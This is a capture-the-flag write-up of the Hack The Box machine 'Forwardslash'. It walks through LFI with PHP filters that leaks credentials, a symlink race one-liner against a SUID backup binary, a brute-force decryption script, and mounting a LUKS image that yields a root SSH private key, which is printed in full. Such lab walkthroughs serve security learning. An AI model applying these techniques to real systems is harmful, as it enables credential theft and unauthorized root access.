Forwardslash

TL;DR

  • Find the subdomain called backup
  • Exploit LFI to retrieve first user credentials
  • Race condition on backup script to read the configuration file and find the second user credentials
  • Crack a crypto script to retrieve a key
  • Mount a ciphered partition and use the key found in the previous script

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/forwardslash$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN forwardslash.txt
# Nmap 7.60 scan initiated Sun Apr 12 22:04:40 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN forwardslash.txt 10.10.10.183
Increasing send delay for 10.10.10.183 from 0 to 5 due to 148 out of 493 dropped probes since last increase.
Warning: 10.10.10.183 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.183 from 640 to 1000 due to 170 out of 566 dropped probes since last increase.
Nmap scan report for forwardslash.htb (10.10.10.183)
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2020-04-12 22:04:41 CEST for 138s
Not shown: 52808 closed ports, 12725 filtered ports
Reason: 52808 resets and 12725 no-responses
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVtpfErAVlI+ACU8NH8NHbRBZj2g7pj5jk7xusWAA/J6ulNja04hhSJ/A2uEXiZg/4KrFVby7q/7IkSoNlgFkkICScBz6THy7Zfp3Xtaxoy97nlX7lb3RVzkOAtXhxCHCvIZpLUpURXHl/dQ/UXo8LS5JtuISZZCscxtRQiDUI9ySN7gPkpmNYE/UOoY/gg7+EY5qvvJ8gBzjPj6Q1C7veALXy8cE9hZpB3l3e7DdrFA0p4PMq2troma315vk0A4SgppfnAJbt8Hos6HjdQvPstaNybEMIbngABKNqmCQYQ0QQ0EnJjcOfgmODl1a4WQEqWPo7PmlBHcfFwHHkanT
|   256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDA2ykHh+xWYg9uLDiP5jLwuvTda16WWnKjRFi53m4qC+aJorLXxLo1pTC0WcqQnMHhrgmIGoETU8uk8uAZPlYw=
|   256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGcEObi5j/h3qfBkLg9GzHQAruPuU71A9w+DgmAMQsYy
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Backslash Gang
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 22:06:59 2020 -- 1 IP address (1 host up) scanned in 138.50 seconds

So we find 2 useful services on 2 ports:

  • SSH (22)
  • Apache (80)

The website was previously hacked by a group called The Backslash Gang.

ForwardSlash Website

Enumeration

With a Dirbuster scan we find the following note:

Pain, we were hacked by some skids that call themselves the “Backslash Gang”… I know… That name… Anyway I am just leaving this note here to say that we still have that backup site so we should be fine. -chiv

So it seems that they have a backup site, let’s add backup.forwardslash.htb to our /etc/hosts and check if the website exists:

Backup Site

Nice, it seems that we can sign up and have access to those backups.

Sign Up

Backup Menu

LFI

There’s not much on this backup site, we can change our password, username, log out and there’s a couple of articles about the environment and a hall of fame, but a page catch our attention. There’s a profile picture page with disabled fields.

Upload profile picture

Let’s play with Burp and see if we can exploit this form.

LFI Denied

So it seems that we can include the index page directly, let’s try some PHP filter:

Php filter Index

By testing different files, we find the config.php.

<?php
//credentials for the temp db while we recover, had to backup old config, didn't want it getting compromised -pain
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
define('DB_NAME', 'site');

/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>

With Dirbuster, we also find a dev directory.

503 Forbidden

With a PHP filter we can retrieve the following code:

<?php
//include_once ../session.php;
// Initialize the session
session_start();

if((!isset($_SESSION["loggedin"]) || $_SESSION["loggedin"] !== true || $_SESSION['username'] !== "admin") && $_SERVER['REMOTE_ADDR'] !== "127.0.0.1"){
    header('HTTP/1.0 403 Forbidden');
    echo "<h1>403 Access Denied</h1>";
    echo "<h3>Access Denied From ", $_SERVER['REMOTE_ADDR'], "</h3>";
    //echo "<h2>Redirecting to login in 3 seconds</h2>"
    //echo '<meta http-equiv="refresh" content="3;url=../login.php" />';
    //header("location: ../login.php");
    exit;
}
?>
<html>
	<h1>XML Api Test</h1>
	<h3>This is our api test for when our new website gets refurbished</h3>
	<form action="/dev/index.php" method="get" id="xmltest">
		<textarea name="xml" form="xmltest" rows="20" cols="50"><api>
    <request>test</request>
</api>
</textarea>
		<input type="submit">
	</form>

</html>

<!-- TODO:
Fix FTP Login
-->

<?php
if ($_SERVER['REQUEST_METHOD'] === "GET" && isset($_GET['xml'])) {

	$reg = '/ftp:\/\/[\s\S]*\/\"/';
	//$reg = '/((((25[0-5])|(2[0-4]\d)|([01]?\d?\d)))\.){3}((((25[0-5])|(2[0-4]\d)|([01]?\d?\d))))/'

	if (preg_match($reg, $_GET['xml'], $match)) {
		$ip = explode('/', $match[0])[2];
		echo $ip;
		error_log("Connecting");

		$conn_id = ftp_connect($ip) or die("Couldn't connect to $ip\n");

		error_log("Logging in");

		if (@ftp_login($conn_id, "chiv", 'N0bodyL1kesBack/')) {

			error_log("Getting file");
			echo ftp_get_string($conn_id, "debug.txt");
		}

		exit;
	}

	libxml_disable_entity_loader (false);
	$xmlfile = $_GET["xml"];
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$api = simplexml_import_dom($dom);
	$req = $api->request;
	echo "-----output-----<br>\r\n";
	echo "$req";
}

function ftp_get_string($ftp, $filename) {
    $temp = fopen('php://temp', 'r+');
    if (@ftp_fget($ftp, $temp, $filename, FTP_BINARY, 0)) {
        rewind($temp);
        return stream_get_contents($temp);
    }
    else {
        return false;
    }
}

?>

Nice, we have Chiv’s credentials!

chiv:N0bodyL1kesBack/

Let’s try to connect with SSH.

magnussen@funcMyLife:~/forwardslash$ ssh chiv@forwardslash.htb
chiv@forwardslash.htb's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 16 17:57:35 UTC 2020

  System load:  0.42               Processes:            196
  Usage of /:   30.6% of 19.56GB   Users logged in:      0
  Memory usage: 10%                IP address for ens33: 10.10.10.183
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

16 packages can be updated.
0 updates are security updates.


Last login: Tue Mar 24 11:34:37 2020 from 10.10.14.3
chiv@forwardslash:~$

Race Condition

So we have a shell, let’s check what we can do:

chiv@forwardslash:~$ ll
total 32
drwxr-xr-x 5 chiv chiv 4096 Mar 24 10:53 ./
drwxr-xr-x 4 root root 4096 Mar  5 14:23 ../
lrwxrwxrwx 1 root root    9 Mar  6 09:43 .bash_history -> /dev/null
-rw-r--r-- 1 chiv chiv  220 Mar  5 14:23 .bash_logout
-rw-r--r-- 1 chiv chiv 3771 Mar  5 14:23 .bashrc
drwx------ 2 chiv chiv 4096 Mar  5 14:29 .cache/
drwx------ 3 chiv chiv 4096 Mar  5 14:29 .gnupg/
drwxrwxr-x 3 chiv chiv 4096 Mar 24 10:53 .local/
-rw-r--r-- 1 chiv chiv  807 Mar  5 14:23 .profile
chiv@forwardslash:~$ ll ../
chiv/ pain/
chiv@forwardslash:~$ ll ../pain/
total 48
drwxr-xr-x 7 pain pain 4096 Mar 17 20:28 ./
drwxr-xr-x 4 root root 4096 Mar  5 14:23 ../
lrwxrwxrwx 1 pain root    9 Mar  6 09:43 .bash_history -> /dev/null
-rw-r--r-- 1 pain pain  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 pain pain 3771 Apr  4  2018 .bashrc
drwx------ 2 pain pain 4096 Mar  5 14:22 .cache/
drwx------ 3 pain pain 4096 Mar  5 14:22 .gnupg/
drwxrwxr-x 3 pain pain 4096 Mar  6 14:23 .local/
-rw-r--r-- 1 pain pain  807 Apr  4  2018 .profile
drwx------ 2 pain pain 4096 Mar 17 20:29 .ssh/
drwxr-xr-x 2 pain root 4096 Mar 24 12:06 encryptorinator/
-rw-r--r-- 1 pain root  256 Jun  3  2019 note.txt
-rw------- 1 pain pain   33 Apr 16 17:56 user.txt
chiv@forwardslash:~$ find / -user pain 2>> /dev/null | grep -v proc
/var/backups/config.php.bak
/usr/bin/backup
/home/pain
/home/pain/.bash_history
/home/pain/.cache
/home/pain/.profile
/home/pain/user.txt
/home/pain/.gnupg
/home/pain/.bashrc
/home/pain/.local
/home/pain/.local/share
/home/pain/.bash_logout
/home/pain/.ssh
/home/pain/encryptorinator
/home/pain/encryptorinator/encrypter.py
/home/pain/encryptorinator/ciphertext
/home/pain/note.txt
chiv@forwardslash:~$ ll /usr/bin/backup
-r-sr-xr-x 1 pain pain 13384 Mar  6 10:06 /usr/bin/backup*
chiv@forwardslash:~$ ll /var/backups/
total 812
drwxr-xr-x  3 root root             4096 Mar 24 10:10 ./
drwxr-xr-x 14 root root             4096 Mar  5 14:25 ../
-rw-r--r--  1 root root            61440 Mar 24 06:25 alternatives.tar.0
-rw-r--r--  1 root root            38908 Mar 24 06:17 apt.extended_states.0
-rw-r--r--  1 root root             4115 Mar  6 14:17 apt.extended_states.1.gz
-rw-r--r--  1 root root             3909 Mar  5 14:46 apt.extended_states.2.gz
-rw-------  1 pain pain              526 Jun 21  2019 config.php.bak
-rw-r--r--  1 root root              437 Mar  5 14:07 dpkg.diversions.0
-rw-r--r--  1 root root              207 Mar  5 14:47 dpkg.statoverride.0
-rw-r--r--  1 root root           668374 Mar 24 06:17 dpkg.status.0
-rw-------  1 root root              730 Mar 17 20:13 group.bak
-rw-------  1 root shadow            604 Mar 17 20:13 gshadow.bak
-r--r--r--  1 root root              129 May 27  2019 note.txt
-rw-------  1 root root             1660 Mar  5 14:46 passwd.bak
drwxrwx---  2 root backupoperator   4096 May 27  2019 recovery/
-rw-------  1 root shadow           1174 Mar  6 14:21 shadow.bak

There’s an other user called pain and a binary called backup with the SUID. There’s also a backup directory with a config.php.bak file and a note:

Chiv, this is the backup of the old config, the one with the password we need to actually keep safe. Please DO NOT TOUCH. -Pain

If we use the program, we have the following message:

chiv@forwardslash:~$ backup
----------------------------------------------------------------------
	Pain's Next-Gen Time Based Backup Viewer
	v0.1
	NOTE: not reading the right file yet,
	only works if backup is taken in same second
----------------------------------------------------------------------

Current Time: 18:08:35
ERROR: b3ac9b5b950b1cf99281a5591206c193 Does Not Exist or Is Not Accessible By Me, Exiting...

The md5 is the time’s hash at runtime.

So it seems, that this binary is trying to read a file with the name of the time’s hash at runtime.

If this file doesn’t exists or is not accessible by pain the program crashes. It’s perfect, the program wants a file that exists and owned by pain and we want to read the config.php.bak owned by pain.

We can exploit this script by executing the script, extract the md5sum, create a symlink to config.php.bak and rerun the script to read this file. But we have to be quick and execute those steps at the same second otherwise the md5sum will be different.

chiv@forwardslash:~$ test=$(backup | grep ERROR | awk '{print $2}') && ln -s /var/backups/config.php.bak $test && backup $test
----------------------------------------------------------------------
	Pain's Next-Gen Time Based Backup Viewer
	v0.1
	NOTE: not reading the right file yet,
	only works if backup is taken in same second
----------------------------------------------------------------------

Current Time: 18:18:16
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'pain');
define('DB_PASSWORD', 'db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704');
define('DB_NAME', 'site');

/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>

It works! Let’s connect as pain and retrieve the user.txt flag.

chiv@forwardslash:~$ su pain
Password:
pain@forwardslash:/home/chiv$ cd
pain@forwardslash:~$ ll
total 48
drwxr-xr-x 7 pain pain 4096 Mar 17 20:28 ./
drwxr-xr-x 4 root root 4096 Mar  5 14:23 ../
lrwxrwxrwx 1 pain root    9 Mar  6 09:43 .bash_history -> /dev/null
-rw-r--r-- 1 pain pain  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 pain pain 3771 Apr  4  2018 .bashrc
drwx------ 2 pain pain 4096 Mar  5 14:22 .cache/
drwxr-xr-x 2 pain root 4096 Mar 24 12:06 encryptorinator/
drwx------ 3 pain pain 4096 Mar  5 14:22 .gnupg/
drwxrwxr-x 3 pain pain 4096 Mar  6 14:23 .local/
-rw-r--r-- 1 pain root  256 Jun  3  2019 note.txt
-rw-r--r-- 1 pain pain  807 Apr  4  2018 .profile
drwx------ 2 pain pain 4096 Mar 17 20:29 .ssh/
-rw------- 1 pain pain   33 Apr 16 17:56 user.txt
pain@forwardslash:~$ cat user.txt
4b3576818673d8bef8b8789bcd4a829c

I AM ROOT

Crypto

We find the following note in pain’s home:

Pain, even though they got into our server, I made sure to encrypt any important files and then did some crypto magic on the key… I gave you the key in person the other day, so unless these hackers are some crypto experts we should be good to go. -chiv

And the following python script in the encryptorinator directory:

pain@forwardslash:~/encryptorinator$ ll
total 16
drwxr-xr-x 2 pain root 4096 Mar 24 12:06 ./
drwxr-xr-x 7 pain pain 4096 Mar 17 20:28 ../
-rw-r--r-- 1 pain root  165 Jun  3  2019 ciphertext
-rw-r--r-- 1 pain root  931 Jun  3  2019 encrypter.py
pain@forwardslash:~/encryptorinator$ cat encrypter.py
def encrypt(key, msg):
    key = list(key)
    msg = list(msg)
    for char_key in key:
        for i in range(len(msg)):
            if i == 0:
                tmp = ord(msg[i]) + ord(char_key) + ord(msg[-1])
            else:
                tmp = ord(msg[i]) + ord(char_key) + ord(msg[i-1])

            while tmp > 255:
                tmp -= 256
            msg[i] = chr(tmp)
    return '.join(msg)

def decrypt(key, msg):
    key = list(key)
    msg = list(msg)
    for char_key in reversed(key):
        for i in reversed(range(len(msg))):
            if i == 0:
                tmp = ord(msg[i]) - (ord(char_key) + ord(msg[-1]))
            else:
                tmp = ord(msg[i]) - (ord(char_key) + ord(msg[i-1]))
            while tmp < 0:
                tmp += 256
            msg[i] = chr(tmp)
    return '.join(msg)


print encrypt('REDACTED', 'REDACTED')
print decrypt('REDACTED', encrypt('REDACTED', 'REDACTED'))
pain@forwardslash:~/encryptorinator$ cat ciphertext | base64
y9ejmxqULEz2Cj4FvDJY1aILig18ij8ASccp8UWDLZfLklwvO8PHsnnGW3cjTZIV9zLKG9F+kOdZ
EkAntue8mIqF5rOjLAWI69v0UJm6QAQ1hsBmJPlcKgFyondGf7qSM7hn71i/fclpNvC0i/R+30uL
qVnwxY6lkf8nGCWBv2XgHz7grnjdb+QfK2fcGS+xS6wGPv9e3ctWpfcd4ghOsGuKv2UK

The encryptorinator script creates a ciphered text by making the sum of a character, a key char and the previous char. So each ciphered char depends on the previous one.

The ciphertext is 165 bytes long, we can assume that the key isn’t longer than the message, we can easily brute force the key and check if the plain text given is the right one.

To check if the plain text is correct I’ve assumed that the given text would have the word key in it.

Here’s the script to brute force the key and retrieve the plain text from the ciphered text.

import string
from encrypter import encrypt, decrypt

with open('ciphertext') as target:
    ciphertext = target.read().strip()

for length in range(165):
    for value in string.printable:
        msg = decrypt(value * length, ciphertext)

        if ' key ' in msg:
            print(msg)
            exit()

Let’s try it:

magnussen@funcMyLife:~/forwardslash$ echo 'y9ejmxqULEz2Cj4FvDJY1aILig18ij8ASccp8UWDLZfLklwvO8PHsnnGW3cjTZIV9zLKG9F+kOdZEkAntue8mIqF5rOjLAWI69v0UJm6QAQ1hsBmJPlcKgFyondGf7qSM7hn71i/fclpNvC0i/R+30uLqVnwxY6lkf8nGCWBv2XgHz7grnjdb+QfK2fcGS+xS6wGPv9e3ctWpfcd4ghOsGuKv2UK' | base64 -d > ciphertext
magnussen@funcMyLife:~/forwardslash$ python decryptor.py
��%\Q8��
REDACTED
Hl��vF��;�������&you liked my new encryption tool, pretty secure huh, anyway here is the key to the encrypted image from /var/backups/recovery: cB!6%sdH8Lj^@Y*$C2cf

Nice, we have the key, we just have to find where to use it.

Luks

Earlier we found the recovery directory in /var/backups.

pain@forwardslash:/var/backups$ ll /var/backups/recovery/
total 976576
drwxrwx--- 2 root backupoperator       4096 May 27  2019 ./
drwxr-xr-x 3 root root                 4096 Mar 24 10:10 ../
-rw-r----- 1 root backupoperator 1000000000 Mar 24 12:12 encrypted_backup.img

There’s an encrypted disk image, let’s download it and try to mount it on our filesystem:

magnussen@funcMyLife:~/forwardslash$ scp pain@forwardslash.htb:/var/backups/recovery/encrypted_backup.img .
pain@forwardslash.htb's password:
magnussen@funcMyLife:~/forwardslash$ sudo cryptsetup luksOpen /dev/loop30 encrypted_backup.img
Enter passphrase for /dev/loop30:
magnussen@funcMyLife:~/forwardslash$ sudo mkdir /media/forwardslash
magnussen@funcMyLife:~/forwardslash$ sudo mount /dev/mapper/encrypted_backup.img /media/forwardslash/
mount: /media/forwardslash: WARNING: device write-protected, mounted read-only.
magnussen@funcMyLife:~/forwardslash$ ls -alh /media/forwardslash/
total 8,0K
drwxr-xr-x 2 root root   20 mars  17 21:07 .
drwxr-xr-x 4 root root 4,0K avril 16 20:53 ..
-rw-r--r-- 1 root root 1,7K mai   27  2019 id_rsa
magnussen@funcMyLife:~/forwardslash$ cat /media/forwardslash/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA9i/r8VGof1vpIV6rhNE9hZfBDd3u6S16uNYqLn+xFgZEQBZK
RKh+WDykv/gukvUSauxWJndPq3F1Ck0xbcGQu6+1OBYb+fQ0B8raCRjwtwYF4gaf
yLFcOS111mKmUIB9qR1wDsmKRbtWPPPvgs2ruafgeiHujIEkiUUk9f3WTNqUsPQc
u2AG//ZCiqKWcWn0CcC2EhWsRQhLOvh3pGfv4gg0Gg/VNNiMPjDAYnr4iVg4XyEu
NWS2x9PtPasWsWRPLMEPtzLhJOnHE3iVJuTnFFhp2T6CtmZui4TJH3pij6wYYis9
MqzTmFwNzzx2HKS2tE2ty2c1CcW+F3GS/rn0EQIDAQABAoIBAQCPfjkg7D6xFSpa
V+rTPH6GeoB9C6mwYeDREYt+lNDsDHUFgbiCMk+KMLa6afcDkzLL/brtKsfWHwhg
G8Q+u/8XVn/jFAf0deFJ1XOmr9HGbA1LxB6oBLDDZvrzHYbhDzOvOchR5ijhIiNO
3cPx0t1QFkiiB1sarD9Wf2Xet7iMDArJI94G7yfnfUegtC5y38liJdb2TBXwvIZC
vROXZiQdmWCPEmwuE0aDj4HqmJvnIx9P4EAcTWuY0LdUU3zZcFgYlXiYT0xg2N1p
MIrAjjhgrQ3A2kXyxh9pzxsFlvIaSfxAvsL8LQy2Osl+i80WaORykmyFy5rmNLQD
Ih0cizb9AoGBAP2+PD2nV8y20kF6U0+JlwMG7WbV/rDF6+kVn0M2sfQKiAIUK3Wn
5YCeGARrMdZr4fidTN7koke02M4enSHEdZRTW2jRXlKfYHqSoVzLggnKVU/eghQs
V4gv6+cc787HojtuU7Ee66eWj0VSr0PXjFInzdSdmnd93oDZPzwF8QUnAoGBAPhg
e1VaHG89E4YWNxbfr739t5qPuizPJY7fIBOv9Z0G+P5KCtHJA5uxpELrF3hQjJU8
6Orz/0C+TxmlTGVOvkQWij4GC9rcOMaP03zXamQTSGNROM+S1I9UUoQBrwe2nQeh
i2B/AlO4PrOHJtfSXIzsedmDNLoMqO5/n/xAqLAHAoGATnv8CBntt11JFYWvpSdq
tT38SlWgjK77dEIC2/hb/J8RSItSkfbXrvu3dA5wAOGnqI2HDF5tr35JnR+s/JfW
woUx/e7cnPO9FMyr6pbr5vlVf/nUBEde37nq3rZ9mlj3XiiW7G8i9thEAm471eEi
/vpe2QfSkmk1XGdV/svbq/sCgYAZ6FZ1DLUylThYIDEW3bZDJxfjs2JEEkdko7mA
1DXWb0fBno+KWmFZ+CmeIU+NaTmAx520BEd3xWIS1r8lQhVunLtGxPKvnZD+hToW
J5IdZjWCxpIadMJfQPhqdJKBR3cRuLQFGLpxaSKBL3PJx1OID5KWMa1qSq/EUOOr
OENgOQKBgD/mYgPSmbqpNZI0/B+6ua9kQJAH6JS44v+yFkHfNTW0M7UIjU7wkGQw
ddMNjhpwVZ3//G6UhWSojUScQTERANt8R+J6dR0YfPzHnsDIoRc7IABQmxxygXDo
ZoYDzlPAlwJmoPQXauRl1CgjlyHrVUTfS0AkQH2ZbqvK5/Metq8o
-----END RSA PRIVATE KEY-----

Nice! It seems that we have root’s private RSA key! Let’s try to connect with it and retrieve the root.txt flag.

magnussen@funcMyLife:~/forwardslash$ ssh -i /media/forwardslash/id_rsa root@forwardslash.htb
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 16 19:00:16 UTC 2020

  System load:  0.04               Processes:            216
  Usage of /:   30.7% of 19.56GB   Users logged in:      1
  Memory usage: 12%                IP address for ens33: 10.10.10.183
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

16 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Mar 24 12:11:46 2020 from 10.10.14.3
root@forwardslash:~# id
uid=0(root) gid=0(root) groups=0(root)
root@forwardslash:~# cat root.txt
3b7f70c2e0c854f59a65f87d6a103921

I AM ROOT!

I rooted this box one year after signing up on Hack The Box and this was my first hard box, I’ve learned a lot and this was a really fun box.

Thank you InfoSecJack & chivato for this awesome box. And thanks a lot Catwyth and Azgog who helped me on this box!